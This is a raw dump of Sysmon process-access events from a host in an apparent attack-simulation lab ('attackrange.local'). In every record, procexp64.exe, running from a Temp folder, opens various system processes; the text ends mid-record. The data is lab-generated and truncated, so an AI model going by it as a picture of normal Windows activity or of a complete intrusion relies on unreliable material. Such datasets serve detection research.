C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786126Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786125Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786124Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786123Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786122Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786121Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786120Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786119Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786118Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786117Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786116Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786115Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786114Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786113Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786112Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786111Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786110Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786109Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\